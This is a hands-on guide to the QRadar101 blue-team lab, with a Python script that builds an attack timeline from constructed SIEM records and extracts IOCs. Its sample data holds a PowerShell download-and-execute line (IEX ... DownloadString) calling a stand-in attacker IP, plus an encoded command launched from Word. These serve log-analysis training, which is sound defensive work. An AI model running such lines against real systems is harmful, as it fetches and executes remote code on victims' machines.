QRadar101 Lab Challenge

Hands-on Analysis & Investigation Guide

Objectives of the QRadar101 Lab Challenge

  • ✅ Get familiar with IBM QRadar as a SIEM tool.

  • 🔍 Practice filtering and analyzing logs to track attacker activity.

  • 🕵️‍♂️ Investigate a realistic attack scenario using QRadar's event logs and offenses.

  • 🧠 Improve skills in log correlation, event investigation, and IOC identification.

  • 💡 Learn how to extract useful insights and link logs to specific hosts, users, and malicious actions.

  • 📁 Build a clear timeline of the attack using available artifacts (e.g., process creation logs, Suricata alerts, HTTP payloads).

Based on the CyberDefenders Blue Team CTF challenge: https://cyberdefenders.org/blueteam-ctf-challenges/qradar101/
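The last objective above, building a timeline from process creation logs, Suricata alerts and HTTP payloads, is the step most analysts find hardest in the lab because the three artifacts carry different timestamp formats and identify the host differently (hostname versus source IP). The script below is an added example for this guide, not code from the CyberDefenders challenge or from IBM QRadar. It normalises three constructed record types (JSON exports of the kind an analyst would pull from QRadar), sorts them into one timeline, attributes network events to the host and the last logged-on user via a constructed asset map, decodes a PowerShell `-enc` argument, and lists the external IPs and URLs as candidate IOCs. All hostnames, users, addresses (RFC 5737 documentation ranges) and URIs are invented for the example and are not indicators from the real lab.

```python
"""Build one attack timeline from three kinds of QRadar lab artifacts.

Added example; not code from the CyberDefenders challenge or from IBM QRadar.
Records, hostnames, users, IPs, URIs and the asset map are constructed.
"""
import base64
import ipaddress
import json
import re
from dataclasses import dataclass
from datetime import datetime

# Constructed sample artifacts, one JSON record per line.
PROCESS_CREATION = r"""
{"ts":"2024-03-01T10:02:11Z","host":"WS01","user":"CORP\\jsmith","image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe /c powershell -enc SQBFAFgA","parent":"WINWORD.EXE"}
{"ts":"2024-03-01T10:03:40Z","host":"WS01","user":"CORP\\jsmith","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell -enc SQBFAFgA","parent":"cmd.exe"}
"""
SURICATA_EVE = r"""
{"timestamp":"2024-03-01T10:03:45.120000+0000","event_type":"alert","src_ip":"10.0.0.15","dest_ip":"203.0.113.7","dest_port":80,"alert":{"signature":"ET POLICY PowerShell User-Agent"},"http":{"hostname":"203.0.113.7","url":"/stage2.ps1"}}
"""
HTTP_PAYLOADS = r"""
{"ts":"2024-03-01T10:03:46Z","src":"10.0.0.15","dst":"203.0.113.7","method":"GET","uri":"/stage2.ps1","status":200,"body_excerpt":"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/c2')"}
"""
# Constructed asset inventory: internal IPs seen in network logs -> hostnames.
ASSET_MAP = {"10.0.0.15": "WS01"}

# RFC 1918 ranges only; ipaddress.is_private would also flag the documentation IPs used here.
PRIVATE_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://[^\s'\")]+")
ENC_RE = re.compile(r"-(?:enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


@dataclass(order=True)
class Event:
    ts: datetime
    host: str
    user: str
    source: str
    action: str


def parse_ts(value):
    """Normalise the timestamp variants in the artifacts ('Z', '+0000') to aware datetimes."""
    value = value.replace("Z", "+00:00")
    value = re.sub(r"([+-]\d{2})(\d{2})$", r"\1:\2", value)
    return datetime.fromisoformat(value)


def records(text):
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def decode_encoded_command(cmdline):
    """Decode a PowerShell -enc/-EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def build_timeline(proc_text=PROCESS_CREATION, eve_text=SURICATA_EVE,
                   http_text=HTTP_PAYLOADS, asset_map=ASSET_MAP):
    events = []
    for r in records(proc_text):
        action = f"{r['image']} spawned by {r['parent']}: {r['cmdline']}"
        decoded = decode_encoded_command(r["cmdline"])
        if decoded:
            action += f" [decoded: {decoded}]"
        events.append(Event(parse_ts(r["ts"]), r["host"], r["user"], "sysmon", action))
    for r in records(eve_text):
        if r.get("event_type") != "alert":
            continue
        host = asset_map.get(r["src_ip"], r["src_ip"])  # link the flow to a host
        http = r.get("http", {})
        action = (f"{r['alert']['signature']} {r['src_ip']}->{r['dest_ip']}:{r['dest_port']} "
                  f"http://{http.get('hostname', '')}{http.get('url', '')}")
        events.append(Event(parse_ts(r["timestamp"]), host, "-", "suricata", action))
    for r in records(http_text):
        host = asset_map.get(r["src"], r["src"])
        action = f"{r['method']} {r['uri']} {r['status']} to {r['dst']} body={r['body_excerpt']}"
        events.append(Event(parse_ts(r["ts"]), host, "-", "http", action))
    events.sort()
    # Attribute network events to the last user seen in a process event on the same host.
    last_user = {}
    for e in events:
        if e.user != "-":
            last_user[e.host] = e.user
        else:
            e.user = last_user.get(e.host, "-")
    return events


def extract_iocs(timeline):
    """Collect non-RFC1918 IPv4 addresses and URLs referenced anywhere in the timeline."""
    ips, urls = set(), set()
    for e in timeline:
        for ip in IPV4_RE.findall(e.action):
            if not any(ipaddress.ip_address(ip) in net for net in PRIVATE_NETS):
                ips.add(ip)
        urls.update(URL_RE.findall(e.action))
    return {"external_ipv4": ips, "urls": urls}


if __name__ == "__main__":
    tl = build_timeline()
    for e in tl:
        print(e.ts.isoformat(), e.host, e.user, e.source, e.action)
    print(extract_iocs(tl))
```

The same shape works on real QRadar exports: replace the constructed strings with the JSON (or CSV converted to JSON) you pull from the Log Activity tab, and feed the asset map from the Assets tab or DHCP logs. The user attribution step is deliberately simple (last process-creation user on that host); on a shared workstation, confirm it against logon events before putting it in the report.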
